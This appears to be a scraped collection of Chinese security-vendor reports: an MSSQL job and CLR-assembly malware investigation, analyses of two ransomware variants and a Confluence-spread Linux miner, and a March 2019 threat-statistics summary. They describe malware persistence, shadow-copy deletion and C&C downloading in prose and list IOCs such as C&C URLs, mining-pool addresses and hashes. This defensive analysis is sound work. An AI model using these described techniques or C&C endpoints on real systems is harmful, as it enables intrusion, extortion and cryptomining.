没辙了,只能放大招,通过安装监控,在恶意文件生成的时间节点附近排查监控日志。终于在恶意文件被实时监控拦截的时间节点发现了两条通过数据库进程执行了可疑的cmd命令日志,用于运行c:\windows\debug和c:\progra~1目录下的exe文件,由此推测数据库中存在恶意的执行计划:

08.png

 

09.png

对数据库作业进行排查,果然存在一大堆奇怪的计划:

10.png

逐条查看作业步骤,这功能丰富啊,由于内容过多,下面将部分作业对应的命令或功能整理出来:

image.png

可以看到,上一次排查时发现的恶意文件、WMI、注册表等项都可以在表格中找到生成语句,并且还有一些没有排查到的文件,可能被防病毒软件识别清除了。这回可算是结案了吧,先对比作业中的语句将主机上可能存在的残留项都排查一遍,然后删除这些作业。

事情果然没有想象中那么简单,某一个风轻云淡的下午四点,cabs.exe又双叒叕回来了,堪称病毒界的灰太狼。

四点,这个时间点好像似曾相识,每次防病毒软件弹出查杀到cabs.exe的时间好像都是四点,监控日志中数据库进程执行了恶意cmd命令的时间也是四点,直觉告诉我们,SQL作业中肯定还有问题,于是把目光投向了上一次漏掉的数据库作业,在sqlrc中发现了一条执行存储过程的命令,运行一下:

12.png

这不就是我们苦苦寻找的cabs.exe么!原来是隐藏在存储过程中,执行了ExecCode对象的内容:

13.png

14.png

通过查询Transact-SQL中的项,发现执行的对象ExecCode:

15.png

再通过对象名称查询sys.assembly_files表,找到ExecCode对应的content内容,从“4D5A”来看,这应该就是我们要找的目标:

16.png

病毒文件分析

将十六进制数据拷贝出来转换为PE文件,是一个用C#编写的DLL文件,通过MyDownloadFile方法读取指定URL网页的内容:

17.png

该URL的内容如下,也是两个下载链接以及对应保存的完整路径,其中ok.exe地址已失效,ups.rar就是我们发现的cabs.exe:

18.png

MyDownloadFile方法的执行过程如下:

19.png

下载的cabs.exe是一个下载器,会下载Mykings、Mirai、暗云、挖矿等多个恶意模块到受害主机,功能十分复杂:

20.png

解决方案

1.删除SQL Server中的恶意作业和存储过程;

2.删除主机中存在的恶意程序、WMI、注册表项等,详见下表:

image.png

3. SQL Server使用强密码;

IOC

image.png 

背景概述

近日,深信服安全团队捕获到利用Confluence新型漏洞传播勒索病毒的事件,已有政企机构受到攻击,黑客团伙通过漏洞利用入侵服务器,上传Downloader脚本文件,连接C&C端下载运行勒索病毒。通过样本中提取的IP进行关联,该攻击事件与利用Confluence漏洞(CVE-2019-3396)传播GandCrab勒索病毒攻击事件有密切的关联。

经深信服安全团队分析,该勒索病毒在功能代码结构上与“侠盗”病毒GandCrab非常相似,同时应用了多种反调试和混淆方式,进行调试时会导致主机蓝屏,且似乎还处于不断调试的阶段,与“侠盗”团队有很大关联,确认是GandCrab勒索病毒最新变种。该勒索病毒使用RSA+AES算法进行加密,加密文件后会使用随机字符串作为后缀,且更换屏幕为深蓝背景的Image text,具体勒索特征如下:

01.png

释放勒索信息文件“加密后缀-readme.txt”:

02.png

排查过程

1.排查被加密的服务器,通过修改日期,发现文件在4.27日五点五十左右被加密:

03.png

2.排查病毒文件,发现在temp目录和IE缓存目录下存在勒索病毒文件:

04.png

3. 排查到用于下载勒索病毒文件的vbs脚本,文件名为poc.vbs经过检查确定是针对confluence最新漏洞的poc,属于手动投毒:

05.png

4.病毒文件确认,加密现象与遭到攻击的服务器相同:

06.png

威胁情报关联

1.通过哈希搜索,Virustotal上该病毒文件的上传时间就在近日,且通过加密现象来看属于一种新的勒索病毒变种:

07.png

2.通过病毒下载链接中的IP(188[.]166[.]74[.]218)进行威胁情报关联,该C&C端近日被用于下载恶意文件:

08.png

3.该IP还关联到通过Confluence漏洞(CVE-2019-3396)传播CandCrab勒索病毒的相关事件,链接如下:

· https://blog.alertlogic.com/active-exploitation-of-confluence-vulnerability-cve-2019-3396-dropping-gandcrab-ransomware/

由此可见,该攻击者(团伙)近期活跃频繁,且惯用手法是利用新型漏洞传播勒索病毒,入侵用户终端,并且疑似在开发新型的勒索病毒家族变种。

病毒详细分析

1.样本母体使用各种加密操作,如下所示:

09.png

2.解密出第一层Payload代码,如下所示:

10.png

3.解密出勒索核心Payload代码,如下所示:

11.png

4.创建互斥变量,如下所示:

12.png

5.在内存中解密出勒索相关信息,如下所示:

13.png

6.提升进程权限,如下所示:

14.png

7.内存中解密出勒索信息文本,如下所示:

15.png

8.生成随机勒索信息文本文件名:[随机数字字符串]+[-readme.txt],如下所示:

16.png

9.获取键盘布局,如下所示:

17.png

如果为以下区域,则退出程序,如下所示:

18.0.png

对应的相应区域,如下所示:

1.png

10.遍历进程,结束mysql.exe进程,如下所示:

19.png

11.通过cmd.exe执行相应的命令,删除磁盘卷影,如下所示:

20.png

12.遍历磁盘文件目录,如下所示:

21.png

13.遍历共享文件目录,如下所示:

22.png

14.遍历磁盘文件,如下所示:

23.png

15.加密文件,使用RSA+AES算法进行加密,如下所示:

24.png

16.生成勒索信息桌面图片,更改桌面背景图片,如下所示:

25.png

17.从内存中解密出来的域名列表中,选取一个然后进行URL拼接,如下所示:

26.png

相应的域名列表,如下所示:

sochi-okna23.ru;www.blavait.fr;kamin-somnium.de;geoweb.software;www.drbrianhweeks.com;kombi-dress.com;johnkoen.com;prodentalblue.com;transifer.fr;matteoruzzaofficial.com;jax-interim-and-projectmanagement.com;hawaiisteelbuilding.com;www.kausette.com;www.galaniuklaw.com;www.atma.nl;www.piestar.com;www.kerstliedjeszingen.nl;biodentify.ai;endlessrealms.net;condormobile.fr;www.cxcompany.com;www.cascinarosa33.it;awaitspain.com;ultimatelifesource.com;goeppinger-teppichreinigung.de等

18.拼接出来的URL,然后发送相应的数据,如下所示:

27.png

主机相关数据,如下所示:

28.png

发送相应的HTTP请求,如下所示:

29.png

解决方案

针对已经出现勒索现象的用户,由于暂时没有解密工具,建议尽快对感染主机进行断网隔离。深信服提醒广大用户尽快做好病毒检测与防御措施,防范该病毒家族的勒索攻击。

病毒防御

深信服安全团队再次提醒广大用户,勒索病毒以防为主,目前大部分勒索病毒加密后的文件都无法解密,注意日常防范措施:

1、及时给电脑打补丁,修补漏洞。

2、对重要的数据文件定期进行非本地备份。

3、升级Confluence版本,

版本6.6.12及更高版本的6.6.x.

版本6.12.3及更高版本的6.12.x

版本6.13.3及更高版本的6.13.x

版本6.14.2及更高版本

4、主动升级widgetconnector-3.1.3.jar 到 widgetconnector-3.1.4.jar。

5、深信服防火墙客户,建议升级到AF805版本,并开启人工智能引擎Save,以达到最好的防御效果。

最后,建议企业对全网进行一次安全检查和杀毒扫描,加强防护工作。

一、样本简介

近期,国外某安全论坛公布了一款类似Globelmposter的新型勒索病毒,此勒索病毒的某些行为与Globelmposter类似,因联系邮箱中带有x_mister而被命名为X_Mister勒索病毒,该勒索病毒使用RSA+DES算法加密文件,自身不具备横向感染功能,通常由攻击者对目标进行RDP爆破后手动投放,或通过垃圾邮件传播,且加密完成后会进行自删除。

深信服安全团队第一时间获取到相应的样本,并对样本进行了详细分析。

二、勒索病毒特征

1.勒索信息文本文件HOW TO BACK YOUR FILES.txt,如下所示:

01.png

2.加密后的文件名,[原文件名]+[Mr-X666],如下所示:

02.png

三、详细分析

1. 获取程序执行信息,并在内存中解密相应数据,如下所示:

03.png

2.进行提权操作,设置进行权限为SeBackupPrivilege、SeRestorePrivilege、SeSecurityPrivilege、SeManageVolumePrivilege,如下所示:

04.png

3.关闭windows defender的实时防护、行为监控等,如下所示:

05.png

4.设置为自启动项,实现开机自启动操作,如下所示:

06.png

5.遍历设定卷标盘符,如下所示:

07.png

6.遍历网络共享目录文件,如下所示:

08.png

7.遍历磁盘目录,如下所示:

09.png

8.创建线程遍历共享目录和磁盘目录下的文件,然后创建线程进行加密操作,如下所示:

10.png

9.生成隐藏文件.BFC0E91B00AE8A0620D3,写入相应的勒索相关信息,加密后缀、勒索文本文件名、勒索软件版本号等,如下所示:

11.png

10.生成勒索信息文本文件,如下所示:

12.png

11.加密文件操作,加密算法为RSA+DES,如下所示:

13.png

13.加密完成之后,删除自启动注册表项,如下所示:

14.png

14.执行删除磁盘卷影 、删除远程桌面连接信息 、删除日志信息等操作,如下所示:

15.png

15.进行自删除操作,如下所示:

16.png

四、 解决方案

针对已经出现勒索现象的用户,由于暂时没有解密工具,建议尽快对感染主机进行断网隔离。深信服提醒广大用户尽快做好病毒检测与防御措施,防范该病毒家族的勒索攻击。

病毒防御

深信服安全团队再次提醒广大用户,勒索病毒以防为主,目前大部分勒索病毒加密后的文件都无法解密,注意日常防范措施:

1、及时给电脑打补丁,修复漏洞。

2、对重要的数据文件定期进行非本地备份。

3、不要点击来源不明的邮件附件,不从不明网站下载软件。

4、尽量关闭不必要的文件共享权限。

5、更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃。

6、如果业务上无需使用RDP的,建议关闭RDP。

最后,建议企业对全网进行一次安全检查和杀毒扫描,加强防护工作。

一、现象描述

近日,深信服EDR产品率先检测到一款新型Linux挖矿木马,经深信服安全专家分析,该病毒利用Confluence漏洞传播,通过定时下载对病毒体进行保活,同时由于病毒会杀掉包含“https://”、“http://”的进程,将导致用户无法下载文件及访问网页,挖矿进程会导致服务器出现卡顿等异常现象。深信服安全团队对该挖矿木马进行了详细的技术分析,并根据其母体文件名将其命名为seasame。

感染该木马后现象如下,可以看到一个CPU占用异常高的vmlinuz进程以及3个采用7位随机字符拼凑的进程。

1.jpg

另外,还会出现无法使用wget和curl命令,以及无法打开浏览器等问题。

2.jpg

该病毒目前的传播途径主要是利用Confluence近期公布的远程代码执行漏洞CVE-2019-3396和CVE-2019-3398,这里提醒有安装该软件的用户需要注意进行防御。

二、详细分析

2.1 母体脚本

一些初始化变量如下,其中entropy为C&C服务器字符串的翻转,C&C服务器地址为51[.]15[.]56[.]161[:]443;变量new_bash、new_dog、new_killbot、omelette为后面要创建的文件名,均由7位随机的字符串组成,后面描述这些文件时都直接使用其对应的变量名;_b,_j等变量用于拼凑shell命令。

3.jpg

根据是否存在vmlinuz进程及其CPU占用是否超过30%,判断系统是否已经感染,如果已经感染则杀掉其他CPU占用高于30%的进程并退出脚本:

4.jpg

下载挖矿程序omelette及母体脚本seasame到/tmp目录下,并执行挖矿程序。

5.jpg

创建crontab定时任务:

6.jpg

创建的定时任务如下,每隔5分钟都会从C&C服务器下载母体脚本seasame到/tmp目录下并执行:

7.jpg

删除iptables命令,将wget重命名为wgetak,curl命令重命名为curlak。

8.jpg

创建cloud_agent.service服务:

9.jpg

cloud_agent.service服务如下,同样用于下载并执行母体脚本seasame:

10.jpg

将bash命令复制到当前目录,然后分别执行3个脚本。new_dog:守护挖矿进程;new_killbot:清除除vmlinuz以外,CPU占用大于30%的进程;prot:杀掉包含“https://”、“http://”、“eval”的进程。

11.jpg

2.2 挖矿程序

1.打开相应的文件,如果文件不存在,则生成相应的文件,如下所示:

12.jpg

2.生成/temp/ec2a6文件,如下所示:

生成的文件,如下所示:

14.png

3.生成/var/tmp/f41,如下所示:

15.png

4.生成de33f4f911f20761,如下所示:

生成的文件,如下所示:

17.png

5.获取主机CPU信息,如下所示:

18.png

6.解密出相应的矿池IP地址:51.38.133.232、51.15.56.161,如下所示:

19.png

7.然后拼接不同的端口号,组成相应的矿池地址,如下所示:

20.png

组合成的矿池地址列表,如下所示:

· 51.38.133.232:443

· 51.15.56.161:80

· 51.38.133.232:21

· 51.15.56.161:20

· 51.38.133.232:53

· 51.15.56.161:53

· 51.38.133.232:162

· 51.15.56.161:161

· 51.38.133.232:990

· 51.15.56.161:989

· 51.38.133.232:1111

· 51.15.56.161:1111

· 51.38.133.232:2222

· 51.15.56.161:2222

· 51.38.133.232:3333

· 51.15.56.161:3333

· 51.38.133.232:4444

· 51.15.56.161:4444

· 51.38.133.232:8181

· 51.15.56.161:8080

· 51.38.133.232:25200

· 51.15.56.161:25400

8.创建子进程,进行挖矿操作,如下所示:

21.png

创建挖矿进程过程,如下所示:

22.png

相应的进程信息,如下所示:

23.png

top进程信息,如下所示:

24.png

9.挖矿进程相关参数,如下所示:

25.png

捕获到的相应的流量数据包,如下所示:

26.png

挖矿相关流量数据包,如下所示:

27.png

矿池IP地址为矿池地址列表中的:51.38.133.232:443

10.连接远程矿池地址,如下所示:

28.png

请求连接51.15.56.161,如下所示:

29.png

获取到的流量数据,如下所示:

30.png

如果连接失败,则请求连接51.38.133.232,如下所示:

31.png

返回相应的数据,如下所示:

32.png

拼接相应的内容,如下所示:

34.png

然后将获取的内容,写入到/temp/yayscript.sh脚本中,并通过bash执行sh脚本,如下所示:

35.png

yayscript.sh的内容,如下所示:

36.png

三、解决方案

病毒检测查杀

1、深信服为广大用户免费提供针对seasame病毒的专杀工具,进行检测查杀。

2、深信服EDR产品、下一代防火墙及安全感知平台等安全产品均具备病毒检测能力,部署相关产品用户可进行病毒检测,如图所示:

38.jpg

四、IOC

URL:

· hxxp://51.15.56.161:443/86su[.]jpg

· hxxp://51.15.56.161:443/86du[.]jpg

· hxxp://51.15.56.161:443/86s[.]jpg

· hxxp://51.15.56.161:443/86d[.]jpg

· hxxp://51.15.56.161:443/46su[.]jpg

· hxxp://51.15.56.161:443/46du[.]jpg

· hxxp://51.15.56.161:443/46s[.]jpg

· hxxp://51.15.56.161:443/46d[.]jpg

· hxxp://51.15.56.161:443/83su[.]jpg

· hxxp://51.15.56.161:443/83du[.]jpg

· hxxp://51.15.56.161:443/83s[.]jpg

· hxxp://51.15.56.161:443/83d[.]jpg

· hxxp://51.15.56.161:443/43su[.]jpg

· hxxp://51.15.56.161:443/43du[.]jpg

· hxxp://51.15.56.161:443/43s[.]jpg

· hxxp://51.15.56.161:443/43d[.]jpg

· hxxp://51.15.56.161:443/a6u[.]jpg

· hxxp://51.15.56.161:443/a6[.]jpg

MD5:

· CD4BF850A354A80EB860586D253A4385

· D71EB083E7943F0641982797C09F3E73

一、网络安全状况概述

2019年3月,互联网网络安全状况整体指标平稳,但有几个特征值得关注。一方面,是勒索病毒依然猖獗,深信服安全云脑监测到Globelmposter、GandCrab、Crysis等病毒活跃热度居高不下,变种层出不穷,近期出现Globelmposter 4.0、GandCrab 5.2等勒索变种。用户一旦遭受勒索病毒攻击,绝大多数文件将被加密,且大多暂时无法解密,造成无法估量的损失;另一方面,APT(高级持续性威胁)活跃程度在3月有所增加,针对性攻击更加明显,各厂商也在密切关注,攻防博弈战激烈上演。此外,监测数据显示,网站攻击数量在3月持续放缓,但网站漏洞问题依然严峻。

3月,深信服安全云脑累计发现:

· 恶意攻击16.31亿次,平均每天拦截恶意程序5261万次。

· 活跃恶意程序24439个,其中感染型病毒4134个,占比16.92%;木马远控病毒7539个,占比30.85%。挖矿病毒种类246个,拦截次数9.82亿次,较上月有所上升,其中Xmrig病毒家族最为活跃。

深信服漏洞监测平台对国内已授权的6996个站点进行漏洞监控,发现:

· 高危站点2721个,高危漏洞60628个,主要漏洞类别是XSS注入、信息泄漏、CSRF跨站请求伪造。

· 监控在线业务6715个,共有276个在线业务发生过真实篡改,篡改占比高达4.11%。

二、恶意程序活跃详情

2019年3月,病毒攻击的态势与2月相比有所上升,病毒拦截量比2月份上升近16%,近半年拦截恶意程序数量趋势如下图所示:

image.png

2019年3月,深信服安全云脑检测到的活跃恶意程序样本有24439个,其中木马远控病毒7539个,占比30.85%,感染型病毒4134个,占比16.92%,蠕虫病毒2631个,占比10.77%,挖矿病毒246个,占比1.01%,勒索病毒188个,占比0.77%。

3月总计拦截恶意程序16.31亿次,其中挖矿病毒的拦截量占比60.24%,其次是感染型病毒(16.4%)、木马远控病毒(12.29%)、蠕虫病毒(6.71%)、后门软件(3.01%)、勒索病毒(1.21%)。

image.png

2.1 挖矿病毒活跃状况

2019年3月,深信服安全云脑在全国共拦截挖矿病毒9.82亿次,较2月环比增加7%,其中最为活跃的挖矿病毒是Xmrig、WannaMine、MinePool、BitcoinMiner、ZombieboyMiner、FalseSign,特别是Xmrig家族,共拦截4.58亿次。同时监测数据显示,被挖矿病毒感染的地域主要有浙江、北京、广东等地,其中浙江省感染量全国第一。

image.png

被挖矿病毒感染的行业分布如下图所示,其中政府受挖矿病毒感染情况最为严重,感染比例和2月相比下降2个百分点,其次是企业和教育行业。

image.png

2.2 感染型病毒活跃状况

2019年3月,深信服安全云脑检测并捕获感染型病毒样本4134个,共拦截2.67亿次。其中Ramnit家族是成为本月攻击态势最为活跃的感染型病毒家族,共被拦截1.09亿次,此家族占了所有感染型病毒拦截数量的40.77%;而排名第二第三的是Virut和Sality家族,本月拦截比例分别是为39.79%和11.83%。3月份感染型病毒活跃家族TOP榜如下图所示:

image.png

在感染型病毒危害地域分布上,广东省(病毒拦截量)位列全国第一,占TOP10总量的25%,其次为浙江省和湖南省。

image.png

从感染型病毒攻击的行业分布来看,黑客更倾向于使用感染型病毒攻击企业、教育、政府等行业。企业、教育、政府的拦截数量占拦截总量的75%,具体感染行业分布如下图所示:

image.png

2.3 木马远控病毒活跃状况

深信服安全云脑3月全国检测到木马远控病毒样本7539个,共拦截2.00亿次,拦截量较2月上升31%。其中最活跃的木马远控家族是Injector,拦截数量达2537万次,其次是Zusy、XorDDos。

image.png

对木马远控病毒区域拦截量进行分析统计发现,恶意程序拦截量最多的地区为广东省,占TOP10拦截量的 21%,与2月份基本持平;其次为浙江(17%)、北京(13%)、四川(11%)和湖北(7%);此外山东、上海、广西壮族自治区、江苏、福建的木马远控拦截量也排在前列。

image.png

行业分布上,企业、教育及政府行业是木马远控病毒的主要攻击对象。

image.png

2.4 蠕虫病毒活跃状况

2019年3月深信服安全云脑在全国检测到蠕虫病毒样本2631个,共拦截1.09亿次。通过数据统计分析来看,大多数攻击都是来自于Gamarue、Jenxcus、Dorkbot、Mydoom、Conficker、Vobfus、Palevo、Bondat、Buzus、Phorpiex家族。这些家族占据了3月全部蠕虫病毒攻击的98.8%,其中攻击态势最活跃的蠕虫病毒是Gamarue,占蠕虫病毒攻击总量的67%。

image.png

从感染地域上看,广东地区用户受蠕虫病毒感染程度最为严重,其拦截量占TOP10比例的28%;其次为江西省(16%)、湖南省(11%)。

image.png

从感染行业上看,企业、教育等行业受蠕虫感染程度较为严重。

image.png

2.5 勒索病毒活跃状况

2019年3月,共拦截活跃勒索病毒1967万次。其中,WannaCry、Razy、Gandcrab、Revenge、Locky、Teslacrypt、Mamba、Badrabbit、Cerber、Cryptowall、Matrix、Paradise、Torrentlocker依然是最活跃的勒索病毒家族,其中WannaCry家族本月拦截数量有1084万次,危害依然较大。

从勒索病毒倾向的行业来看,企业和教育感染病毒数量占总体的51%,是黑客最主要的攻击对象。具体活跃病毒行业分布如下图所示:

image.png

从勒索病毒受灾地域上看,广东地区受感染情况最为严重,其次是浙江省和江苏省。

image.png

三、网络安全攻击趋势分析

深信服全网安全态势感知平台监测到全国34808个IP在3月所受网络攻击总量约为4亿次。本月攻击态势与前三个月相比明显下降。下图为近半年深信服网络安全攻击趋势监测情况:

image.png

3.1 安全攻击趋势

下面从攻击类型分布和重点漏洞攻击分析2个纬度展示3月现网的攻击趋势:

· 攻击类型分布

通过对深信服安全云脑数据分析可以看到,3月捕获攻击以系统漏洞利用、WebServer漏洞利用、Web扫描等分类为主。其中系统漏洞利用类型的占比更是高达28.70%,有近亿的命中日志;WebServer漏洞利用类型均占比23.34%;Web扫描类型的漏洞占比17.72%。此外,信息泄露攻击、Webshell上传等攻击类型在3月的攻击数量有所增长。

image.png

主要攻击种类和比例如下:

image.png

· 重点漏洞攻击分析

通过对深信服安全云脑数据进行分析,针对漏洞的攻击情况筛选出3月攻击利用次数TOP20的漏洞。

其中命中次数前三漏洞利用分别是test.php、test.aspx、test.asp等文件访问检测漏洞、Apache Web Server ETag Header 信息泄露漏洞和Microsoft Windows Server 2008/2012 – LDAP RootDSE Netlogon 拒绝服务漏洞,攻击次数分别为49,047,012、39,407,152和28,619,006。较上月均有小幅上升。

image.png

3.2 高危漏洞攻击趋势

深信服安全团队对重要软件漏洞进行深入跟踪分析,近年来Java中间件远程代码执行漏洞频发,同时受永恒之蓝影响使得Windows SMB、Struts2和Weblogic漏洞成为黑客最受欢迎的漏洞攻击方式。

2019年3月,Windows SMB日志量达千万级,近几月攻击趋势持持续上升,其中拦截到的(MS17-010)Microsoft Windows SMB Server 远程代码执行漏洞攻击利用日志最多;Struts2系列漏洞攻击趋势近几月攻击次数波动较大,Weblogic系列漏洞的攻击趋势结束了前几月的持续降低,本月拦截到近两百万攻击日志;PHPCMS系列漏洞近几月攻击次数大幅上升,近期应重点关注。

Windows SMB 系列漏洞攻击趋势跟踪情况:

image.png

Struts 2系列漏洞攻击趋势跟踪情况:

image.png

Weblogic系列漏洞攻击趋势跟踪情况:

image.png

PHPCMS系列漏洞攻击趋势跟踪情况:

image.png

四、网络安全漏洞分析

4.1 网站漏洞类型统计

深信服云眼网站安全监测平台3月对国内已授权的6966个站点进行漏洞监控,3月发现的高危站点2721个,高危漏洞60628个,漏洞类别占比前三的分别是XSS注入,信息泄露和CSRF跨站请求伪造,共占比79.68%,具体比例如下:

image.png

4.2 篡改情况统计

3月共监控在线业务6715个,共识别潜在篡改的网站有276个,篡改总发现率高达4.11%。其中首页篡改226个,二级页面篡改32个,多级页面篡改18个。篡改位置具体分布图如下图所示:

image.png

上图可以看出,网站首页篡改为篡改首要插入位置,成为黑客利益输出首选。

五、近期流行攻击事件及安全漏洞盘点

5.1 流行攻击事件

(1)警惕“驱动人生”木马最新变种袭击MSSQL数据库

近期,驱动人生供应链传播的木马病毒再次升级变异,大面积袭卷国内政府、医院以及各大企业。这次变种在原有攻击模块的基础上,新增了MSSQL爆破攻击的功能,更为致命的是,当病毒爆破成功后,还会将用户密码改为ksa8hd4,[email protected]~#$%^&*(),严重影响了正常业务。具体详见:

https://mp.weixin.qq.com/s/pekbjCSyg2oDOPisfzOK9g

(2)5.2版本发布:被各大安全厂商“掏空”的GandCrab又有新的变种了?

GandCrab勒索病毒是2018年勒索病毒家族中最活跃的家族,GandCrab5.2为该家族最新变种,近期在国内较多的已投递恶意邮件的方式进行攻击,邮件内容通常带有恐吓性质。具体详见:

https://mp.weixin.qq.com/s/2QhwVYEO26kllWlrRX7fLA

(3)数百以色列热门网站成为耶路撒冷攻击活动目标,向Windows用户传播JCry勒索病毒

 2019年3月,国外黑客组织针对数百个备受欢迎的以色列网站发起了一系列攻击活动,活动命名为耶路撒冷,其目的是通过JCry勒索病毒感染Windows用户,为了达到这个目的,攻击者修改了来自nagich.com的流行网络辅助功能插件的DNS记录,当访问者访问使用此插件的网站时,将加载恶意脚本而不是合法插件。具体详见:

https://mp.weixin.qq.com/s/OnaWth1_Q5HtH8vEGQFnBA

(4)预警!Globelmposter 4.0最新变种来袭,多家企业中招

深信服安全团队一直持续关注并跟踪Globelmposter勒索病毒家族,多次发布此勒索病毒相应的预警报告,近期又发现一例最新Globelmposter 4.0变种样本。具体详见:

https://mp.weixin.qq.com/s/fmeZZiRmkfYi-K1H0RAKTg

(5)WannaMine升级到V4.0版本,警惕中招!

近期,多个企业反馈大量主机和服务器存在卡顿和蓝屏现象,该企业用户中的是最新型的WannaMine变种,此病毒变种是基于WannaMine3.0改造,又加入了一些新的免杀技术,传播机制与WannaCry勒索病毒一致。具体详见:

https://mp.weixin.qq.com/s/TZWELDP78vv4Vdrn5smTrA

(6)“天堂”竟然伸出恶魔之手?Paradise勒索病毒再度席卷

Paradise(天堂)勒索病毒最早出现在2018年七月份左右,感染多家企业。此次的变种借用了CrySiS家族的勒索信息,代码结构也跟早期版本有了很大的区别。具体详见:

https://mp.weixin.qq.com/s/O4uMtDdFWVmAh2VEP3n7Kg

(7)全球最大铝生产商挪威海德鲁(Norsk Hydro)遭到LockerGoga勒索病毒攻击

 据外媒报道,全球最大铝生产商之一挪威海德鲁(Norsk Hydro)公司于本月19号遭到一款新型勒索软件LockerGoga攻击,企业IT系统遭到破环,被迫临时关闭多个工厂并将挪威、卡塔尔和巴西等国家的工厂运营模式改为“可以使用的”手动运营模式,以继续执行某些运营。具体详见:

https://mp.weixin.qq.com/s/Izl9dGKObok2Wlu_qh32_w

(8)高龄病毒“熊猫烧香”还没退休?

近期,深信服安全团队收到客户反馈,其内网多台主机中的文件感染了病毒,影响正常业务。经分析,该病毒为“熊猫烧香”病毒变种,虽然该病毒已有十余年历史,但由于其具有很强的感染及传播性,依然很容易在缺少防护的企业内网中传播开来。具体详见:

https://mp.weixin.qq.com/s/gDlwSKrDwMoPjVyS7cRaXw

(9)华硕软件更新服务器遭黑客劫持,自动更新向用户下发恶意程序

卡巴斯基实验室(Kaspersky Lab)于3月25日曝光华硕(ASUS)的软件更新服务器曾在去年遭到黑客入侵,并以更新的名义在用户的电脑上植入一个恶意程序;此次攻击事件虽然因为自动更新策略影响了大量用户,但真正的攻击活动似乎只针对恶意程序中硬编码了MAC地址哈希值的600多台特定设备。具体详见:

https://mp.weixin.qq.com/s/_t67DHNQnV2I4AiCUPPwUw

5.2 安全漏洞事件

(1)【漏洞预警】Apache Solr Deserialization 远程代码执行漏洞(CVE-2019-0192)

近期,Apache Solr官方团队在最新的安全更新中披露了一则Apache Solr Deserialization 远程代码执行漏洞(CVE-2019-0192)。漏洞官方定级为 High,属于高危漏洞。该漏洞本质是ConfigAPI允许通过HTTP POST请求配置Solr的JMX服务器。攻击者可以通过ConfigAPI将其配置指向恶意RMI服务器,利用Solr的不安全反序列化来触发Solr端上的远程代码执行。具体详见:

https://mp.weixin.qq.com/s/ZtqM2EhB2BbZmDt1omvF6A

(2)【漏洞预警】Zimbra 邮件系统远程代码执行漏洞(CVE-2019-9621 CVE-2019-9670)

近期,国外安全研究人员Tint0在博客中披露了一个针对Zimbra 邮件系统进行综合利用来达到远程代码执行效果的漏洞(CVE-2019-9621 CVE-2019-9670)。此漏洞的主要利用手法是通过XXE(XML 外部实体注入)漏洞读取localconfig.xml配置文件来获取Zimbra admin ldap password,接着通过SOAP AuthRequest 认证得到Admin Authtoken,最后使用全局管理令牌通过ClientUploader扩展上传Webshell到Zimbra服务器,从而实现通过Webshell来达到远程代码执行效果。具体详见:

https://mp.weixin.qq.com/s/d_kIzQ0cJF0GhUFRQFJ4Tw

(3)【漏洞预警】WordPress Social Warfare Plugin 远程代码执行漏洞

2019年3月25日,国外安全研究人员在大量攻击数据中发现了一个WordPress plugins Social Warfare远程代码执行漏洞,此漏洞允许攻击者接管整个WordPress站点并管理您的主机帐户上的所有文件和数据库,从而实现完全远程接管整个服务器的目的。具体详见:

https://mp.weixin.qq.com/s/BeswVrHAL0iUPw2BE34Zig

六、安全防护建议

黑客入侵的主要目标是存在通用安全漏洞的机器,所以预防病毒入侵的主要手段是发现和修复漏洞,深信服建议用户做好以下防护措施:

 (一)、杜绝使用弱口令,避免一密多用

系统、应用相关的用户杜绝使用弱口令,同时,应该使用高复杂强度的密码,尽量包含大小写字母、数字、特殊符号等的混合密码,禁止密码重用的情况出现,尽量避免一密多用的情况。

 (二)、及时更新重要补丁和升级组件

建议关注操作系统和组件重大更新,如永恒之蓝漏洞,使用正确渠道,如微软官网,及时更新对应补丁漏洞或者升级组件。

 (三)、部署加固软件,关闭非必要端口

服务器上部署安全加固软件,通过限制异常登录行为、开启防爆破功能、防范漏洞利用,同时限制服务器及其他业务服务网可进行访问的网络、主机范围。有效加强访问控制ACL策略,细化策略粒度,按区域按业务严格限制各个网络区域以及服务器之间的访问,采用白名单机制只允许开放特定的业务必要端口,提高系统安全基线,防范黑客入侵。

 (四)、主动进行安全评估,加强人员安全意识

加强人员安全意识培养,不要随意点击来源不明的邮件附件,不从不明网站下载软件,对来源不明的文件包括邮件附件、上传文件等要先杀毒处理。定期开展对系统、应用以及网络层面的安全评估、渗透测试以及代码审计工作,主动发现目前系统、应用存在的安全隐患。

 (五)、建立威胁情报分析和对抗体系,有效防护病毒入侵

网络犯罪分子采取的战术策略也在不断演变,其攻击方式和技术更加多样化。对于有效预防和对抗海量威胁,需要选择更强大和更智能的防护体系。